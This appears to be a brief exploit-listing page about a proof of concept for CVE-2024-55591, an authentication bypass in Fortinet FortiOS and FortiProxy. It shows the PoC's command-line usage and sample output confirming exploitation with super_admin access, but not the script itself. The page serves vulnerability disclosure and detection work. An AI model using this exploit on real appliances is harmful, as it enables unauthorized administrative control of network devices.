Exploit for Authentication Bypass Using an Alternate Path or Channel in Fortinet Fortiproxy
Discription

image
CVE-2024-55591 A Fortinet FortiOS Authentication Bypass Proof of Concept See our blog post for technical details Detection in Action “` python CVE-2024-55591-PoC.py –host 192.168.1.5 –port 443 –command "get system status" –user watchTowr –ssl __ ___ __ __ _ / | _ | |__ ____ _ ________ / / _ / | | | | / _ / / _ __ / / __ | | | Y | |( <> / | | /_/ (_ |_| \ ||_| | / /_/ || CVE-2024-55591.py (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr – Sonny , watchTowr ([email protected]) CVEs: [CVE-2024-55591] [] Checking if target is a FortiOS Management interface [] Target is confirmed as a FortiOS Management interface [*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337 Output from server: � get system status Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443 Unknown action 0 FAKESERIAL # FAKESERIAL # get system status Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M) Security Level: High Firmware Signature: certified Virus-DB: 1.00000(2018-04-09 18:07) “` Description This…Read More

Back to Main

Subscribe for the latest news: